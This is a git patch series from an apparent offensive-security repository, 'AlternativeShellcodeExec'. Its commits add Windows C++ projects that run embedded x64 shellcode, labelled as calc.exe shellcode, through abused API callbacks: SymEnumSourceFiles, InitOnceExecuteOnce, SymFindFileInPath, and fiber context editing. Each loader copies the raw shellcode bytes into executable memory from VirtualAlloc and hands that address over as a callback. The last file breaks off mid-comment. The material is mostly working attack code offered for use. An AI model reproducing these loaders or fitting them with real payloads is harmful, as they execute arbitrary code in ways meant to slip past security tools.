From 1800715fbdd3c54b5c55d4cb6d006bdc296c886b Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 21 Mar 2021 17:41:35 -0400 Subject: [PATCH 01/28] O_o --- AlternativeShellcodeExec.sln | 10 ++ SysEnumSourceFiles/SysEnumSourceFiles.cpp | 41 +++++ SysEnumSourceFiles/SysEnumSourceFiles.vcxproj | 147 ++++++++++++++++++ .../SysEnumSourceFiles.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.cpp create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.vcxproj create mode 100644 SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 71bc92d..a7896f3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -43,6 +43,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymEnumProcesses", "SymEnum EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumDirTreeW", "EnumDirTreeW\EnumDirTreeW.vcxproj", "{F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysEnumSourceFiles", "SysEnumSourceFiles\SysEnumSourceFiles.vcxproj", "{0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -211,6 +213,14 @@ Global {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x64.Build.0 = Release|x64 {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x86.ActiveCfg = Release|Win32 {F22C852B-1CAA-4132-BDF3-F7AFAD1D65D2}.Release|x86.Build.0 = Release|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x64.ActiveCfg = Debug|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x64.Build.0 = Debug|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x86.ActiveCfg = Debug|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Debug|x86.Build.0 = Debug|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.ActiveCfg = Release|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.Build.0 = Release|x64 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.ActiveCfg = Release|Win32 + {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.cpp b/SysEnumSourceFiles/SysEnumSourceFiles.cpp new file mode 100644 index 0000000..43acb2f --- /dev/null +++ b/SysEnumSourceFiles/SysEnumSourceFiles.cpp @@ -0,0 +1,41 @@ +#include +#include + +// requires Dbghelp.lib +#include +#pragma comment(lib, "Dbghelp.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + ::SymInitialize(::GetCurrentProcess(), NULL, TRUE); + + ::SymEnumSourceFiles(::GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACK)address, NULL); + + +} \ No newline at end of file diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj new file mode 100644 index 0000000..8548bbc --- /dev/null +++ b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {0c660de2-1fac-4be7-a1ba-0ba0e96c1562} + SysEnumSourceFiles + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters new file mode 100644 index 0000000..6346f0d --- /dev/null +++ b/SysEnumSourceFiles/SysEnumSourceFiles.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 2acde74d69a56dd974d2b7f99047ad7f05d7d903 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sat, 27 Mar 2021 14:45:05 -0400 Subject: [PATCH 02/28] Cache me outsaaaaaaid how bout that --- AlternativeShellcodeExec.sln | 20 +++ InitOnceExecuteOnce/InitOnceExecuteOnce.cpp | 41 +++++ .../InitOnceExecuteOnce.vcxproj | 147 ++++++++++++++++++ .../InitOnceExecuteOnce.vcxproj.filters | 22 +++ SymFindFileInPath/SymFindFileInPath.cpp | 50 ++++++ SymFindFileInPath/SymFindFileInPath.vcxproj | 147 ++++++++++++++++++ .../SymFindFileInPath.vcxproj.filters | 22 +++ 7 files changed, 449 insertions(+) create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.cpp create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj create mode 100644 InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters create mode 100644 SymFindFileInPath/SymFindFileInPath.cpp create mode 100644 SymFindFileInPath/SymFindFileInPath.vcxproj create mode 100644 SymFindFileInPath/SymFindFileInPath.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index a7896f3..792921e 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -45,6 +45,10 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumDirTreeW", "EnumDirTree EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysEnumSourceFiles", "SysEnumSourceFiles\SysEnumSourceFiles.vcxproj", "{0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymFindFileInPath", "SymFindFileInPath\SymFindFileInPath.vcxproj", "{81376644-3F09-490E-963E-2266154C188E}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "InitOnceExecuteOnce\InitOnceExecuteOnce.vcxproj", "{92EE01BF-6B18-44F2-AC69-29D9D7920D6E}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -221,6 +225,22 @@ Global {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x64.Build.0 = Release|x64 {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.ActiveCfg = Release|Win32 {0C660DE2-1FAC-4BE7-A1BA-0BA0E96C1562}.Release|x86.Build.0 = Release|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x64.ActiveCfg = Debug|x64 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x64.Build.0 = Debug|x64 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x86.ActiveCfg = Debug|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Debug|x86.Build.0 = Debug|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Release|x64.ActiveCfg = Release|x64 + {81376644-3F09-490E-963E-2266154C188E}.Release|x64.Build.0 = Release|x64 + {81376644-3F09-490E-963E-2266154C188E}.Release|x86.ActiveCfg = Release|Win32 + {81376644-3F09-490E-963E-2266154C188E}.Release|x86.Build.0 = Release|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x64.ActiveCfg = Debug|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x64.Build.0 = Debug|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x86.ActiveCfg = Debug|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Debug|x86.Build.0 = Debug|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.ActiveCfg = Release|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.Build.0 = Release|x64 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.ActiveCfg = Release|Win32 + {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp b/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp new file mode 100644 index 0000000..e10e96e --- /dev/null +++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp @@ -0,0 +1,41 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +int main() { + + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + PVOID lpContext; + BOOL bStatus; + + INIT_ONCE g_InitOnce = INIT_ONCE_STATIC_INIT; + + ::InitOnceExecuteOnce(&g_InitOnce, (PINIT_ONCE_FN)address, NULL, &lpContext); + + +} \ No newline at end of file diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj new file mode 100644 index 0000000..0b098bd --- /dev/null +++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {92ee01bf-6b18-44f2-ac69-29d9d7920d6e} + InitOnceExecuteOnce + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters new file mode 100644 index 0000000..de6fc5a --- /dev/null +++ b/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/SymFindFileInPath/SymFindFileInPath.cpp b/SymFindFileInPath/SymFindFileInPath.cpp new file mode 100644 index 0000000..ac67f42 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.cpp @@ -0,0 +1,50 @@ +#include +#include + +// requires Dbghelp.lib +#include +#pragma comment(lib, "Dbghelp.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +int main() { + + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + ::SymInitialize(hProcess, NULL, TRUE); + + SYMSRV_INDEX_INFO finfo; + ::SymSrvGetFileIndexInfo("c:\\windows\\system32\\kernel32.dll", &finfo, NULL); + + char dummy[MAX_PATH]; + + + ::SymFindFileInPath(hProcess, "c:\\windows\\system32", "kernel32.dll", &finfo.timestamp, finfo.size, 0, SSRVOPT_DWORDPTR, dummy, (PFINDFILEINPATHCALLBACK)address, NULL); + + + return 0; + +} \ No newline at end of file diff --git a/SymFindFileInPath/SymFindFileInPath.vcxproj b/SymFindFileInPath/SymFindFileInPath.vcxproj new file mode 100644 index 0000000..aa9b747 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {81376644-3f09-490e-963e-2266154c188e} + SymFindFileInPath + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SymFindFileInPath/SymFindFileInPath.vcxproj.filters b/SymFindFileInPath/SymFindFileInPath.vcxproj.filters new file mode 100644 index 0000000..39ac045 --- /dev/null +++ b/SymFindFileInPath/SymFindFileInPath.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 13768dde172ce24ce30a032ecc61d1cb1527083b Mon Sep 17 00:00:00 2001 From: alfarom256 Date: Sat, 27 Mar 2021 15:09:16 -0400 Subject: [PATCH 03/28] Adding execution through Fiber Context editing. Not the same as CreateFiber(PtrToShellcode) --- AlternativeShellcodeExec.sln | 10 ++ FiberContextEdit/FiberContextEdit.vcxproj | 147 ++++++++++++++++++ .../FiberContextEdit.vcxproj.filters | 22 +++ FiberContextEdit/Source.cpp | 112 +++++++++++++ 4 files changed, 291 insertions(+) create mode 100644 FiberContextEdit/FiberContextEdit.vcxproj create mode 100644 FiberContextEdit/FiberContextEdit.vcxproj.filters create mode 100644 FiberContextEdit/Source.cpp diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 792921e..6b123db 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -49,6 +49,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SymFindFileInPath", "SymFin EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InitOnceExecuteOnce", "InitOnceExecuteOnce\InitOnceExecuteOnce.vcxproj", "{92EE01BF-6B18-44F2-AC69-29D9D7920D6E}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FiberContextEdit", "FiberContextEdit\FiberContextEdit.vcxproj", "{1E97F40F-E056-4468-94EA-15636B98B5D0}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -241,6 +243,14 @@ Global {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x64.Build.0 = Release|x64 {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.ActiveCfg = Release|Win32 {92EE01BF-6B18-44F2-AC69-29D9D7920D6E}.Release|x86.Build.0 = Release|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x64.ActiveCfg = Debug|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x64.Build.0 = Debug|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x86.ActiveCfg = Debug|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Debug|x86.Build.0 = Debug|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.ActiveCfg = Release|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x64.Build.0 = Release|x64 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.ActiveCfg = Release|Win32 + {1E97F40F-E056-4468-94EA-15636B98B5D0}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/FiberContextEdit/FiberContextEdit.vcxproj b/FiberContextEdit/FiberContextEdit.vcxproj new file mode 100644 index 0000000..f670826 --- /dev/null +++ b/FiberContextEdit/FiberContextEdit.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {1e97f40f-e056-4468-94ea-15636b98b5d0} + FiberContextEdit + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/FiberContextEdit/FiberContextEdit.vcxproj.filters b/FiberContextEdit/FiberContextEdit.vcxproj.filters new file mode 100644 index 0000000..3e7e62e --- /dev/null +++ b/FiberContextEdit/FiberContextEdit.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/FiberContextEdit/Source.cpp b/FiberContextEdit/Source.cpp new file mode 100644 index 0000000..07b5aa2 --- /dev/null +++ b/FiberContextEdit/Source.cpp @@ -0,0 +1,112 @@ +// alfarom256 +#include +#include + +void dummy() { + puts("Hello Fiber from Dummy"); +} + +// calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +//https://github.com/reactos/reactos/blob/2e1aeb12dfd8b44b4b57d377b59ef347dfe3386e/dll/win32/kernel32/client/fiber.c +//https://doxygen.reactos.org/dd/d83/ndk_2ketypes_8h_source.html#l00179 + + +// s/o to ch3rn0byl and s4r1n +// am I doing s00p3r c001 1337 gr33tz right? +int main() { + + + /* + _TEB.SameTebFlags = _TEB + 0x17ee + dt _TEB: + + +0x17ee SameTebFlags : Uint2B + +0x17ee SafeThunkCall : Pos 0, 1 Bit + +0x17ee InDebugPrint : Pos 1, 1 Bit + +0x17ee HasFiberData : Pos 2, 1 Bit + +0x17ee SkipThreadAttach : Pos 3, 1 Bit + +0x17ee WerInShipAssertCode : Pos 4, 1 Bit + +0x17ee RanProcessInit : Pos 5, 1 Bit + +0x17ee ClonedThread : Pos 6, 1 Bit + +0x17ee SuppressDebugMsg : Pos 7, 1 Bit + +0x17ee DisableUserStackWalk : Pos 8, 1 Bit + +0x17ee RtlExceptionAttached : Pos 9, 1 Bit + +0x17ee InitialThread : Pos 10, 1 Bit + +0x17ee SessionAware : Pos 11, 1 Bit + +0x17ee 